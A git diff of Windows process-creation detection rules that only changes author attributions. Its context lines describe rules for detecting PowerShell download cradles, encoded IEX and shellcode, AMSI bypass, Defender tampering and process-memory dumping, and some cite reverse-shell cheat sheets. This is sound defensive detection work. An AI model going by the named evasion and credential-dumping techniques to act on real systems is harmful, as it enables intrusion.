a/rules/windows/process_creation/proc_creation_win_nslookup_poweshell_download.yml b/rules/windows/process_creation/proc_creation_win_nslookup_poweshell_download.yml index 4a10ff9e0..adee3b066 100644 --- a/rules/windows/process_creation/proc_creation_win_nslookup_poweshell_download.yml +++ b/rules/windows/process_creation/proc_creation_win_nslookup_poweshell_download.yml @@ -9,7 +9,7 @@ status: experimental description: Detects suspicious powershell download cradle using nslookup. This cradle uses nslookup to extract payloads from DNS records references: - https://twitter.com/Alh4zr3d/status/1566489367232651264 -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/09/05 modified: 2022/12/19 tags: diff --git a/rules/windows/process_creation/proc_creation_win_obfuscated_ip_download.yml b/rules/windows/process_creation/proc_creation_win_obfuscated_ip_download.yml index da5168e98..c99274158 100644 --- a/rules/windows/process_creation/proc_creation_win_obfuscated_ip_download.yml +++ b/rules/windows/process_creation/proc_creation_win_obfuscated_ip_download.yml @@ -5,7 +5,7 @@ description: Detects use of an encoded/obfuscated version of an IP address (hex, references: - https://h.43z.one/ipconverter/ - https://twitter.com/Yasser_Elsnbary/status/1553804135354564608 -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2022/08/03 tags: - attack.discovery diff --git a/rules/windows/process_creation/proc_creation_win_obfuscated_ip_via_cli.yml b/rules/windows/process_creation/proc_creation_win_obfuscated_ip_via_cli.yml index 102c3cba6..6d4f429ff 100644 --- a/rules/windows/process_creation/proc_creation_win_obfuscated_ip_via_cli.yml +++ b/rules/windows/process_creation/proc_creation_win_obfuscated_ip_via_cli.yml @@ -5,7 +5,7 @@ description: Detects usage of an encoded/obfuscated version of an IP address (he references: - https://h.43z.one/ipconverter/ - https://twitter.com/Yasser_Elsnbary/status/1553804135354564608 -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/08/03 tags: - attack.discovery diff --git a/rules/windows/process_creation/proc_creation_win_office_dir_traversal_cli.yml b/rules/windows/process_creation/proc_creation_win_office_dir_traversal_cli.yml index 0fe0ed302..fa7032332 100644 --- a/rules/windows/process_creation/proc_creation_win_office_dir_traversal_cli.yml +++ b/rules/windows/process_creation/proc_creation_win_office_dir_traversal_cli.yml @@ -4,7 +4,7 @@ status: experimental description: Detects Office Applications executing a Windows child process including directory traversal patterns references: - https://twitter.com/sbousseaden/status/1531653369546301440 -author: '@SBousseaden (idea), Christian Burkard (rule)' +author: '@SBousseaden (idea), Christian Burkard (Nextron Systems) (rule)' date: 2022/06/02 tags: - attack.execution diff --git a/rules/windows/process_creation/proc_creation_win_office_shell.yml b/rules/windows/process_creation/proc_creation_win_office_shell.yml index c03ae9eea..bc7cf180e 100644 --- a/rules/windows/process_creation/proc_creation_win_office_shell.yml +++ b/rules/windows/process_creation/proc_creation_win_office_shell.yml @@ -5,7 +5,7 @@ description: Detects a Windows command and scripting interpreter executable star references: - https://www.hybrid-analysis.com/sample/465aabe132ccb949e75b8ab9c5bda36d80cf2fd503d52b8bad54e295f28bbc21?environmentId=100 - https://mgreen27.github.io/posts/2018/04/02/DownloadCradle.html -author: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team +author: Michael Haag, Florian Roth (Nextron Systems), Markus Neis, Elastic, FPT.EagleEye Team date: 2018/04/06 modified: 2022/07/14 tags: diff --git a/rules/windows/process_creation/proc_creation_win_office_svchost_child.yml b/rules/windows/process_creation/proc_creation_win_office_svchost_child.yml index 0016a5e9e..e92550801 100644 --- a/rules/windows/process_creation/proc_creation_win_office_svchost_child.yml +++ b/rules/windows/process_creation/proc_creation_win_office_svchost_child.yml @@ -5,7 +5,7 @@ description: Detects svchost process spawning an instance of an office applicati references: - https://learn.microsoft.com/en-us/previous-versions/office/troubleshoot/office-developer/automate-word-create-file-using-visual-basic - https://github.com/med0x2e/vba2clr -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/10/13 tags: - attack.execution diff --git a/rules/windows/process_creation/proc_creation_win_outlook_shell.yml b/rules/windows/process_creation/proc_creation_win_outlook_shell.yml index 7e9cd8111..fa99690b4 100644 --- a/rules/windows/process_creation/proc_creation_win_outlook_shell.yml +++ b/rules/windows/process_creation/proc_creation_win_outlook_shell.yml @@ -8,7 +8,7 @@ description: Detects a Windows command and scripting interpreter executable star references: - https://www.hybrid-analysis.com/sample/465aabe132ccb949e75b8ab9c5bda36d80cf2fd503d52b8bad54e295f28bbc21?environmentId=100 - https://mgreen27.github.io/posts/2018/04/02/DownloadCradle.html -author: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team +author: Michael Haag, Florian Roth (Nextron Systems), Markus Neis, Elastic, FPT.EagleEye Team date: 2022/02/28 modified: 2022/05/31 tags: diff --git a/rules/windows/process_creation/proc_creation_win_pdqdeploy_runner_susp_children.yml b/rules/windows/process_creation/proc_creation_win_pdqdeploy_runner_susp_children.yml index 18b667aaa..0a06d08f0 100644 --- a/rules/windows/process_creation/proc_creation_win_pdqdeploy_runner_susp_children.yml +++ b/rules/windows/process_creation/proc_creation_win_pdqdeploy_runner_susp_children.yml @@ -7,7 +7,7 @@ status: experimental description: Detects suspicious execution of "PDQDeployRunner" which is part of the PDQDeploy service stack that is responsible for executing commands and packages on a remote machines references: - https://twitter.com/malmoeb/status/1550483085472432128 -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/07/22 tags: - attack.execution diff --git a/rules/windows/process_creation/proc_creation_win_perl_inline_command_execution.yml b/rules/windows/process_creation/proc_creation_win_perl_inline_command_execution.yml index 6d2e148ef..dbed9f99d 100644 --- a/rules/windows/process_creation/proc_creation_win_perl_inline_command_execution.yml +++ b/rules/windows/process_creation/proc_creation_win_perl_inline_command_execution.yml @@ -5,7 +5,7 @@ description: Detects execution of perl using the "-e"/"-E" flags. This is could references: - https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet - https://www.revshells.com/ -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2023/01/02 tags: - attack.execution diff --git a/rules/windows/process_creation/proc_creation_win_persistence_typed_paths.yml b/rules/windows/process_creation/proc_creation_win_persistence_typed_paths.yml index 18723cbf3..6f2bad40a 100644 --- a/rules/windows/process_creation/proc_creation_win_persistence_typed_paths.yml +++ b/rules/windows/process_creation/proc_creation_win_persistence_typed_paths.yml @@ -5,7 +5,7 @@ description: Detects modification addition to the 'TypedPaths' key in the user o references: - https://twitter.com/dez_/status/1560101453150257154 - https://forensafe.com/blogs/typedpaths.html -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/08/22 tags: - attack.persistence diff --git a/rules/windows/process_creation/proc_creation_win_php_inline_command_execution.yml b/rules/windows/process_creation/proc_creation_win_php_inline_command_execution.yml index e36ff3b05..ae425450b 100644 --- a/rules/windows/process_creation/proc_creation_win_php_inline_command_execution.yml +++ b/rules/windows/process_creation/proc_creation_win_php_inline_command_execution.yml @@ -6,7 +6,7 @@ references: - https://www.php.net/manual/en/features.commandline.php - https://www.revshells.com/ - https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2023/01/02 tags: - attack.execution diff --git a/rules/windows/process_creation/proc_creation_win_plugx_susp_exe_locations.yml b/rules/windows/process_creation/proc_creation_win_plugx_susp_exe_locations.yml index 447882dc8..2884d1fcc 100644 --- a/rules/windows/process_creation/proc_creation_win_plugx_susp_exe_locations.yml +++ b/rules/windows/process_creation/proc_creation_win_plugx_susp_exe_locations.yml @@ -5,7 +5,7 @@ description: Detects the execution of an executable that is typically used by Pl references: - http://www.hexacorn.com/blog/2016/03/10/beyond-good-ol-run-key-part-36/ - https://countuponsecurity.com/2017/06/07/threat-hunting-in-the-enterprise-with-appcompatprocessor/ -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2017/06/12 modified: 2022/01/28 tags: diff --git a/rules/windows/process_creation/proc_creation_win_powershell_add_windows_capability.yml b/rules/windows/process_creation/proc_creation_win_powershell_add_windows_capability.yml index 802fa0d09..ecd5a7dd9 100644 --- a/rules/windows/process_creation/proc_creation_win_powershell_add_windows_capability.yml +++ b/rules/windows/process_creation/proc_creation_win_powershell_add_windows_capability.yml @@ -8,7 +8,7 @@ description: Detects usage of the "Add-WindowsCapability" cmdlet to add new wind references: - https://learn.microsoft.com/en-us/windows-server/administration/openssh/openssh_install_firstuse?tabs=powershell - https://www.virustotal.com/gui/file/af1c82237b6e5a3a7cdbad82cc498d298c67845d92971bada450023d1335e267/content -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2023/01/22 tags: - attack.execution diff --git a/rules/windows/process_creation/proc_creation_win_powershell_amsi_null_bits_bypass.yml b/rules/windows/process_creation/proc_creation_win_powershell_amsi_null_bits_bypass.yml index 2a6d13d82..44820e5aa 100644 --- a/rules/windows/process_creation/proc_creation_win_powershell_amsi_null_bits_bypass.yml +++ b/rules/windows/process_creation/proc_creation_win_powershell_amsi_null_bits_bypass.yml @@ -7,7 +7,7 @@ status: experimental description: Detects usage of special strings/null bits in order to potentially bypass AMSI functionalities references: - https://github.com/r00t-3xp10it/hacking-material-books/blob/43cb1e1932c16ff1f58b755bc9ab6b096046853f/obfuscation/simple_obfuscation.md#amsi-bypass-using-null-bits-satoshi -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2023/01/04 tags: - attack.defense_evasion diff --git a/rules/windows/process_creation/proc_creation_win_powershell_base64_frombase64string.yml b/rules/windows/process_creation/proc_creation_win_powershell_base64_frombase64string.yml index fcf6ac816..288a7832a 100644 --- a/rules/windows/process_creation/proc_creation_win_powershell_base64_frombase64string.yml +++ b/rules/windows/process_creation/proc_creation_win_powershell_base64_frombase64string.yml @@ -2,7 +2,7 @@ title: PowerShell Base64 Encoded FromBase64String Keyword id: fdb62a13-9a81-4e5c-a38f-ea93a16f6d7c status: test description: Detects usage of a base64 encoded "FromBase64String" cmdlet in a process command line -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2019/08/24 modified: 2023/01/31 tags: diff --git a/rules/windows/process_creation/proc_creation_win_powershell_base64_iex.yml b/rules/windows/process_creation/proc_creation_win_powershell_base64_iex.yml index b549ff4cd..4759efa5a 100644 --- a/rules/windows/process_creation/proc_creation_win_powershell_base64_iex.yml +++ b/rules/windows/process_creation/proc_creation_win_powershell_base64_iex.yml @@ -2,7 +2,7 @@ title: PowerShell Base64 Encoded IEX Keyword id: 88f680b8-070e-402c-ae11-d2914f2257f1 status: test description: Detects usage of a base64 encoded "IEX" string in a process command line -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2019/08/23 modified: 2023/01/30 tags: diff --git a/rules/windows/process_creation/proc_creation_win_powershell_base64_invoke.yml b/rules/windows/process_creation/proc_creation_win_powershell_base64_invoke.yml index 6f2597083..a3134bb1e 100644 --- a/rules/windows/process_creation/proc_creation_win_powershell_base64_invoke.yml +++ b/rules/windows/process_creation/proc_creation_win_powershell_base64_invoke.yml @@ -7,7 +7,7 @@ status: test description: Detects UTF-8 and UTF-16 Base64 encoded powershell 'Invoke-' calls references: - https://thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/ -author: pH-T, Harjot Singh, '@cyb3rjy0t' +author: pH-T (Nextron Systems), Harjot Singh, '@cyb3rjy0t' date: 2022/05/20 modified: 2023/01/27 tags: diff --git a/rules/windows/process_creation/proc_creation_win_powershell_base64_mppreference.yml b/rules/windows/process_creation/proc_creation_win_powershell_base64_mppreference.yml index dd5d65973..d1bcb0500 100644 --- a/rules/windows/process_creation/proc_creation_win_powershell_base64_mppreference.yml +++ b/rules/windows/process_creation/proc_creation_win_powershell_base64_mppreference.yml @@ -6,7 +6,7 @@ references: - https://docs.microsoft.com/en-us/microsoft-365/security/defender-endpoint/configure-process-opened-file-exclusions-microsoft-defender-antivirus - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md - https://twitter.com/AdamTheAnalyst/status/1483497517119590403 -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2022/03/04 modified: 2023/01/30 tags: diff --git a/rules/windows/process_creation/proc_creation_win_powershell_base64_reflective_assembly_load.yml b/rules/windows/process_creation/proc_creation_win_powershell_base64_reflective_assembly_load.yml index 6e97bfed4..d682bc63c 100644 --- a/rules/windows/process_creation/proc_creation_win_powershell_base64_reflective_assembly_load.yml +++ b/rules/windows/process_creation/proc_creation_win_powershell_base64_reflective_assembly_load.yml @@ -8,7 +8,7 @@ description: Detects base64 encoded .NET reflective loading of Assembly references: - https://github.com/Neo23x0/Raccine/blob/20a569fa21625086433dcce8bb2765d0ea08dcb6/yara/mal_revil.yar - https://thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/ -author: Christian Burkard, pH-T +author: Christian Burkard (Nextron Systems), pH-T (Nextron Systems) date: 2022/03/01 modified: 2023/01/30 tags: diff --git a/rules/windows/process_creation/proc_creation_win_powershell_base64_shellcode.yml b/rules/windows/process_creation/proc_creation_win_powershell_base64_shellcode.yml index e3479ff76..7778f93c4 100644 --- a/rules/windows/process_creation/proc_creation_win_powershell_base64_shellcode.yml +++ b/rules/windows/process_creation/proc_creation_win_powershell_base64_shellcode.yml @@ -4,7 +4,7 @@ status: stable description: Detects Base64 encoded Shellcode references: - https://twitter.com/cyb3rops/status/1063072865992523776 -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2018/11/17 modified: 2023/01/26 tags: diff --git a/rules/windows/process_creation/proc_creation_win_powershell_base64_wmi_classes.yml b/rules/windows/process_creation/proc_creation_win_powershell_base64_wmi_classes.yml index 57b68857e..a6ff57a54 100644 --- a/rules/windows/process_creation/proc_creation_win_powershell_base64_wmi_classes.yml +++ b/rules/windows/process_creation/proc_creation_win_powershell_base64_wmi_classes.yml @@ -7,7 +7,7 @@ status: experimental description: Detects calls to base64 encoded WMI class such as "Win32_Shadowcopy", ""...etc. references: - https://github.com/Neo23x0/Raccine/blob/20a569fa21625086433dcce8bb2765d0ea08dcb6/yara/mal_revil.yar -author: Christian Burkard, Nasreddine Bencherchali +author: Christian Burkard (Nextron Systems), Nasreddine Bencherchali date: 2023/01/30 tags: - attack.execution diff --git a/rules/windows/process_creation/proc_creation_win_powershell_defender_disable_feature.yml b/rules/windows/process_creation/proc_creation_win_powershell_defender_disable_feature.yml index f2dd43c5c..b589604b2 100644 --- a/rules/windows/process_creation/proc_creation_win_powershell_defender_disable_feature.yml +++ b/rules/windows/process_creation/proc_creation_win_powershell_defender_disable_feature.yml @@ -6,7 +6,7 @@ references: - https://docs.microsoft.com/en-us/powershell/module/defender/set-mppreference?view=windowsserver2022-ps - https://www.virustotal.com/gui/file/d609799091731d83d75ec5d1f030571af20c45efeeb94840b67ea09a3283ab65/behavior/C2AE - https://www.virustotal.com/gui/search/content%253A%2522Set-MpPreference%2520-Disable%2522/files -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2022/03/03 modified: 2022/03/07 tags: diff --git a/rules/windows/process_creation/proc_creation_win_powershell_defender_exclusion.yml b/rules/windows/process_creation/proc_creation_win_powershell_defender_exclusion.yml index 1825fc3a3..fffeef859 100644 --- a/rules/windows/process_creation/proc_creation_win_powershell_defender_exclusion.yml +++ b/rules/windows/process_creation/proc_creation_win_powershell_defender_exclusion.yml @@ -9,7 +9,7 @@ references: - https://docs.microsoft.com/en-us/microsoft-365/security/defender-endpoint/configure-process-opened-file-exclusions-microsoft-defender-antivirus - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md - https://twitter.com/AdamTheAnalyst/status/1483497517119590403 -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2021/04/29 modified: 2022/05/12 tags: diff --git a/rules/windows/process_creation/proc_creation_win_powershell_download_patterns.yml b/rules/windows/process_creation/proc_creation_win_powershell_download_patterns.yml index 0ead1ec09..fd6e4d62c 100644 --- a/rules/windows/process_creation/proc_creation_win_powershell_download_patterns.yml +++ b/rules/windows/process_creation/proc_creation_win_powershell_download_patterns.yml @@ -5,7 +5,7 @@ related: type: derived status: test description: Detects a Powershell process that contains download commands in its command line string -author: Florian Roth, oscd.community, Jonhnathan Ribeiro +author: Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro date: 2019/01/16 modified: 2023/01/26 tags: diff --git a/rules/windows/process_creation/proc_creation_win_powershell_frombase64string.yml b/rules/windows/process_creation/proc_creation_win_powershell_frombase64string.yml index d92854188..6c2453898 100644 --- a/rules/windows/process_creation/proc_creation_win_powershell_frombase64string.yml +++ b/rules/windows/process_creation/proc_creation_win_powershell_frombase64string.yml @@ -4,7 +4,7 @@ status: test description: Detects usage of the "FromBase64String" function in the commandline which is used to decode a base64 encoded string references: - https://gist.github.com/Neo23x0/6af876ee72b51676c82a2db8d2cd3639 -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2020/01/29 modified: 2023/01/26 tags: diff --git a/rules/windows/process_creation/proc_creation_win_powershell_get_clipboard.yml b/rules/windows/process_creation/proc_creation_win_powershell_get_clipboard.yml index 0215088ab..4a53a3552 100644 --- a/rules/windows/process_creation/proc_creation_win_powershell_get_clipboard.yml +++ b/rules/windows/process_creation/proc_creation_win_powershell_get_clipboard.yml @@ -8,7 +8,7 @@ description: Detects usage of the 'Get-Clipboard' cmdlet via CLI references: - https://github.com/OTRF/detection-hackathon-apt29/issues/16 - https://threathunterplaybook.com/evals/apt29/detections/7.A.2_F4609F7E-C4DB-4327-91D4-59A58C962A02.html -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2020/05/02 modified: 2022/12/25 tags: diff --git a/rules/windows/process_creation/proc_creation_win_powershell_public_folder.yml b/rules/windows/process_creation/proc_creation_win_powershell_public_folder.yml index ba194ffe0..ae53790f7 100644 --- a/rules/windows/process_creation/proc_creation_win_powershell_public_folder.yml +++ b/rules/windows/process_creation/proc_creation_win_powershell_public_folder.yml @@ -4,7 +4,7 @@ status: experimental description: This rule detects execution of PowerShell scripts located in the "C:\Users\Public" folder references: - https://www.mandiant.com/resources/evolution-of-fin7 -author: Max Altgelt +author: Max Altgelt (Nextron Systems) date: 2022/04/06 modified: 2022/07/14 logsource: diff --git a/rules/windows/process_creation/proc_creation_win_powershell_susp_download_patterns.yml b/rules/windows/process_creation/proc_creation_win_powershell_susp_download_patterns.yml index 33bdf05b1..04d05eed9 100644 --- a/rules/windows/process_creation/proc_creation_win_powershell_susp_download_patterns.yml +++ b/rules/windows/process_creation/proc_creation_win_powershell_susp_download_patterns.yml @@ -8,7 +8,7 @@ description: Detects suspicious PowerShell download patterns that are often used references: - https://gist.github.com/jivoi/c354eaaf3019352ce32522f916c03d70 - https://www.trendmicro.com/en_us/research/22/j/lv-ransomware-exploits-proxyshell-in-attack.html -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2022/02/28 modified: 2022/03/01 tags: diff --git a/rules/windows/process_creation/proc_creation_win_powershell_susp_parameter_variation.yml b/rules/windows/process_creation/proc_creation_win_powershell_susp_parameter_variation.yml index 1297d992b..4d3a29e68 100644 --- a/rules/windows/process_creation/proc_creation_win_powershell_susp_parameter_variation.yml +++ b/rules/windows/process_creation/proc_creation_win_powershell_susp_parameter_variation.yml @@ -4,7 +4,7 @@ status: test description: Detects suspicious PowerShell invocation with a parameter substring references: - http://www.danielbohannon.com/blog-1/2017/3/12/powershell-execution-argument-obfuscation-how-it-can-make-detection-easier -author: Florian Roth (rule), Daniel Bohannon (idea), Roberto Rodriguez (Fix) +author: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix) date: 2019/01/16 modified: 2022/07/14 tags: diff --git a/rules/windows/process_creation/proc_creation_win_powertool_execution.yml b/rules/windows/process_creation/proc_creation_win_powertool_execution.yml index 89f26df5e..f4a813301 100644 --- a/rules/windows/process_creation/proc_creation_win_powertool_execution.yml +++ b/rules/windows/process_creation/proc_creation_win_powertool_execution.yml @@ -7,7 +7,7 @@ references: - https://www.trendmicro.com/en_us/research/22/i/play-ransomware-s-attack-playbook-unmasks-it-as-another-hive-aff.html - https://twitter.com/gbti_sa/status/1249653895900602375?lang=en - https://www.softpedia.com/get/Antivirus/Removal-Tools/ithurricane-PowerTool.shtml -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/11/29 tags: - attack.defense_evasion diff --git a/rules/windows/process_creation/proc_creation_win_proc_dump_createdump.yml b/rules/windows/process_creation/proc_creation_win_proc_dump_createdump.yml index 60f245540..c1177087c 100644 --- a/rules/windows/process_creation/proc_creation_win_proc_dump_createdump.yml +++ b/rules/windows/process_creation/proc_creation_win_proc_dump_createdump.yml @@ -5,7 +5,7 @@ description: Detects uses of the createdump.exe LOLOBIN utility to dump process references: - https://www.crowdstrike.com/blog/overwatch-exposes-aquatic-panda-in-possession-of-log-4-shell-exploit-tools/ - https://twitter.com/bopin2020/status/1366400799199272960 -author: Florian Roth, Nasreddine Bencherchali +author: Florian Roth (Nextron Systems), Nasreddine Bencherchali date: 2022/01/04 modified: 2022/08/19 tags: diff --git a/rules/windows/process_creation/proc_creation_win_proc_dump_dumpminitool.yml b/rules/windows/process_creation/proc_creation_win_proc_dump_dumpminitool.yml index b58372b9f..0f87dfe8c 100644 --- a/rules/windows/process_creation/proc_creation_win_proc_dump_dumpminitool.yml +++ b/rules/windows/process_creation/proc_creation_win_proc_dump_dumpminitool.yml @@ -5,7 +5,7 @@ description: Detects the use of a Visual Studio bundled tool named DumpMinitool. references: - https://twitter.com/mrd0x/status/1511415432888131586?s=20&t=DvVrzeZ1OcGiWowbhPV8Lg - https://twitter.com/mrd0x/status/1511489821247684615 -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2022/04/06 modified: 2022/11/18 tags: diff --git a/rules/windows/process_creation/proc_creation_win_proc_dump_rdrleakdiag.yml b/rules/windows/process_creation/proc_creation_win_proc_dump_rdrleakdiag.yml index 3b1aef48f..f2f9b4066 100644 --- a/rules/windows/process_creation/proc_creation_win_proc_dump_rdrleakdiag.yml +++ b/rules/windows/process_creation/proc_creation_win_proc_dump_rdrleakdiag.yml @@ -4,7 +4,7 @@ status: experimental description: Detects uses of the rdrleakdiag.exe LOLOBIN utility to dump process memory references: - https://www.crowdstrike.com/blog/overwatch-exposes-aquatic-panda-in-possession-of-log-4-shell-exploit-tools/ -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2022/01/04 modified: 2022/05/10 tags: diff --git a/rules/windows/process_creation/proc_creation_win_proc_dump_susp_dumpminitool.yml b/rules/windows/process_creation/proc_creation_win_proc_dump_susp_dumpminitool.yml index aa1739035..72c53b18e 100644 --- a/rules/windows/process_creation/proc_creation_win_proc_dump_susp_dumpminitool.yml +++ b/rules/windows/process_creation/proc_creation_win_proc_dump_susp_dumpminitool.yml @@ -5,7 +5,7 @@ description: Detects suspicious ways to use of a Visual Studio bundled tool name references: - https://twitter.com/mrd0x/status/1511415432888131586 - https://twitter.com/mrd0x/status/1511489821247684615 -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2022/04/06 modified: 2022/12/30 tags: diff --git a/rules/windows/process_creation/proc_creation_win_procdump.yml b/rules/windows/process_creation/proc_creation_win_procdump.yml index d5125b343..0e5b2d472 100644 --- a/rules/windows/process_creation/proc_creation_win_procdump.yml +++ b/rules/windows/process_creation/proc_creation_win_procdump.yml @@ -4,7 +4,7 @@ status: experimental description: Detects usage of the SysInternals Procdump utility references: - Internal Research -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2021/08/16 modified: 2022/08/11 tags: diff --git a/rules/windows/process_creation/proc_creation_win_procdump_evasion.yml b/rules/windows/process_creation/proc_creation_win_procdump_evasion.yml index e7f160290..acab7f0ee 100644 --- a/rules/windows/process_creation/proc_creation_win_procdump_evasion.yml +++ b/rules/windows/process_creation/proc_creation_win_procdump_evasion.yml @@ -4,7 +4,7 @@ status: test description: Detects uses of the SysInternals Procdump utility in which procdump or its output get renamed or a dump file is moved ot copied to a different name references: - https://twitter.com/mrd0x/status/1480785527901204481 -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2022/01/11 tags: - attack.defense_evasion diff --git a/rules/windows/process_creation/proc_creation_win_process_dump_rundll32_comsvcs.yml b/rules/windows/process_creation/proc_creation_win_process_dump_rundll32_comsvcs.yml index 77bde466d..87164869a 100644 --- a/rules/windows/process_creation/proc_creation_win_process_dump_rundll32_comsvcs.yml +++ b/rules/windows/process_creation/proc_creation_win_process_dump_rundll32_comsvcs.yml @@ -12,7 +12,7 @@ references: - https://modexp.wordpress.com/2019/08/30/minidumpwritedump-via-com-services-dll/ - https://twitter.com/SBousseaden/status/1167417096374050817 - https://twitter.com/Wietze/status/1542107456507203586 -author: Florian Roth, Modexp, Nasreddine Bencherchali (update) +author: Florian Roth (Nextron Systems), Modexp, Nasreddine Bencherchali (Nextron Systems) date: 2020/02/18 modified: 2022/09/21 tags: diff --git a/rules/windows/process_creation/proc_creation_win_proxy_execution_wuauclt.yml b/rules/windows/process_creation/proc_creation_win_proxy_execution_wuauclt.yml index 62346dc31..2419bbdc9 100644 --- a/rules/windows/process_creation/proc_creation_win_proxy_execution_wuauclt.yml +++ b/rules/windows/process_creation/proc_creation_win_proxy_execution_wuauclt.yml @@ -10,7 +10,7 @@ description: Detects the use of the Windows Update Client binary (wuauclt.exe) t references: - https://dtm.uk/wuauclt/ - https://blog.malwarebytes.com/threat-intelligence/2022/01/north-koreas-lazarus-apt-leverages-windows-update-client-github-in-latest-campaign/ -author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), Florian Roth, Sreeman, FPT.EagleEye Team +author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), Florian Roth (Nextron Systems), Sreeman, FPT.EagleEye Team date: 2020/10/12 modified: 2022/10/09 tags: diff --git a/rules/windows/process_creation/proc_creation_win_psexesvc_start.yml b/rules/windows/process_creation/proc_creation_win_psexesvc_start.yml index 8088025e5..6f1548074 100644 --- a/rules/windows/process_creation/proc_creation_win_psexesvc_start.yml +++ b/rules/windows/process_creation/proc_creation_win_psexesvc_start.yml @@ -2,7 +2,7 @@ title: PsExec Service Start id: 3ede524d-21cc-472d-a3ce-d21b568d8db7 status: test description: Detects a PsExec service start -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2018/03/13 modified: 2021/11/27 tags: diff --git a/rules/windows/process_creation/proc_creation_win_pua_defendercheck.yml b/rules/windows/process_creation/proc_creation_win_pua_defendercheck.yml index 704d95dc3..ca121baf9 100644 --- a/rules/windows/process_creation/proc_creation_win_pua_defendercheck.yml +++ b/rules/windows/process_creation/proc_creation_win_pua_defendercheck.yml @@ -4,7 +4,7 @@ status: experimental description: Detects the use of DefenderCheck, a tool to evaluate the signatures used in Microsoft Defender. It can be used to figure out the strings / byte chains used in Microsoft Defender to detect a tool and thus used for AV evasion. references: - https://github.com/matterpreter/DefenderCheck -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2022/08/30 tags: - attack.defense_evasion diff --git a/rules/windows/process_creation/proc_creation_win_pua_seatbelt.yml b/rules/windows/process_creation/proc_creation_win_pua_seatbelt.yml index 26e6d5d15..6953bd684 100644 --- a/rules/windows/process_creation/proc_creation_win_pua_seatbelt.yml +++ b/rules/windows/process_creation/proc_creation_win_pua_seatbelt.yml @@ -5,7 +5,7 @@ description: Detects the execution of the PUA/Recon tool Seatbelt via PE informa references: - https://github.com/GhostPack/Seatbelt - https://www.bluetangle.dev/2022/08/fastening-seatbelt-on-threat-hunting.html -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/10/18 tags: - attack.discovery diff --git a/rules/windows/process_creation/proc_creation_win_public_folder_parent.yml b/rules/windows/process_creation/proc_creation_win_public_folder_parent.yml index a38b07fe4..32484460d 100644 --- a/rules/windows/process_creation/proc_creation_win_public_folder_parent.yml +++ b/rules/windows/process_creation/proc_creation_win_public_folder_parent.yml @@ -4,7 +4,7 @@ status: experimental description: This rule detects suspicious processes with parent images located in the C:\Users\Public folder references: - https://redcanary.com/blog/blackbyte-ransomware/ -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2022/02/25 modified: 2022/11/18 logsource: diff --git a/rules/windows/process_creation/proc_creation_win_purplesharp_indicators.yml b/rules/windows/process_creation/proc_creation_win_purplesharp_indicators.yml index dd1c950dd..4883e2eb6 100644 --- a/rules/windows/process_creation/proc_creation_win_purplesharp_indicators.yml +++ b/rules/windows/process_creation/proc_creation_win_purplesharp_indicators.yml @@ -4,7 +4,7 @@ status: test description: Detects the execution of the PurpleSharp adversary simulation tool references: - https://github.com/mvelazc0/PurpleSharp -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2021/06/18 modified: 2023/01/31 tags: diff --git a/rules/windows/process_creation/proc_creation_win_python_inline_command_execution.yml b/rules/windows/process_creation/proc_creation_win_python_inline_command_execution.yml index d3d21d645..9aeddd81f 100644 --- a/rules/windows/process_creation/proc_creation_win_python_inline_command_execution.yml +++ b/rules/windows/process_creation/proc_creation_win_python_inline_command_execution.yml @@ -6,7 +6,7 @@ references: - https://docs.python.org/3/using/cmdline.html#cmdoption-c - https://www.revshells.com/ - https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2023/01/02 modified: 2023/01/10 tags: diff --git a/rules/windows/process_creation/proc_creation_win_quarks_pwdump.yml 